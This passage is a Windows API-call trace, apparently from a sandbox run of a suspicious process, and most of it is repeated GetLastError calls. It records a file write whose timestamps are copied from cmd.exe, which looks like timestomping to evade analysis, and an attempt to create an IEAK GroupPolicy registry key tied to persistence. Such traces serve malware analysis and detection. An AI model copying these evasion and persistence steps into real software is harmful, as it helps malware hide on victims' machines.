	[0093.509] SystemTimeToFileTime (in: lpSystemTime=0x29afe54, lpFileTime=0x29afea8 | out: lpFileTime=0x29afea8) returned 1
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.509] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] GetLastError () returned 0xb7
	[0093.510] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\system32\\cmd.exe", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x1c
	[0093.511] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\system32\\cmd.exe", lpDst=0x64b508, nSize=0x1c | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c
	[0093.511] CreateFileW (lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248
	[0093.511] GetFileTime (in: hFile=0x64b508, lpCreationTime=0x29afe98, lpLastAccessTime=0x29afea0, lpLastWriteTime=0x29afea8 | out: lpCreationTime=0x29afe98*(dwLowDateTime=0x4d290c80, dwHighDateTime=0x1d2e1e2), lpLastAccessTime=0x29afea0*(dwLowDateTime=0x4d290c80, dwHighDateTime=0x1d2e1e2), lpLastWriteTime=0x29afea8*(dwLowDateTime=0x4d290c80, dwHighDateTime=0x1d2e1e2)) returned 0
	[0093.511] SystemTimeToFileTime (in: lpSystemTime=0x29afe54, lpFileTime=0x29afe98 | out: lpFileTime=0x29afe98) returned 1
	[0093.511] SystemTimeToFileTime (in: lpSystemTime=0x29afe54, lpFileTime=0x29afea0 | out: lpFileTime=0x29afea0) returned 1
	[0093.511] SystemTimeToFileTime (in: lpSystemTime=0x29afe54, lpFileTime=0x29afea8 | out: lpFileTime=0x29afea8) returned 1
	[0093.511] CloseHandle (hObject=0x248) returned 1
	[0093.511] WriteFile (in: hFile=0x20c, lpBuffer=0x6a2b60*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x29afeb0, lpOverlapped=0x0 | out: lpBuffer=0x6a2b60*, lpNumberOfBytesWritten=0x29afeb0*=0x112, lpOverlapped=0x0) returned 1
	[0093.511] SetEndOfFile (hFile=0x20c) returned 1
	[0093.513] SetFileTime (hFile=0x20c, lpCreationTime=0x29afe98, lpLastAccessTime=0x29afea0, lpLastWriteTime=0x29afea8) returned 1
	[0093.513] FlushFileBuffers (hFile=0x20c) returned 1
	[0093.515] CloseHandle (hObject=0x20c) returned 1
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.517] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.518] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.519] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.520] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] GetLastError () returned 0x6
	[0093.521] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf023f, lpSecurityAttributes=0x0, phkResult=0x29afd8c, lpdwDisposition=0x0 | out: phkResult=0x29afd8c*=0x0, lpdwDisposition=0x0) returned 0x5
	[0093.522] Sleep (dwMilliseconds=0xea60) 
	[0103.531] GetLastError () returned 0x6
	[0103.531] GetLastError () returned 0x6
	[0103.531] GetLastError () returned 0x6
	[0103.531] GetLastError () returned 0x6
	[0103.531] GetLastError () returned 0x6
	[0103.531] GetLastError () returned 0x6
	[0103.531] GetLastError () returned 0x6
	[0103.531] GetLastError () returned 0x6
	[0103.531] GetLastError () returned 0x6
	[0103.531] GetLastError () returned 0x6
	[0103.531] GetLastError () returned 0x6
	[0103.531] GetLastError () returned 0x6
	[0103.531] GetLastError () returned 0x6
	[0103.531] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.532] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.533] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.534] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.534] GetLastError () returned 0x6
	[0103.534] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.535] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.536] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
	[0103.537] GetLastError () returned 0x6
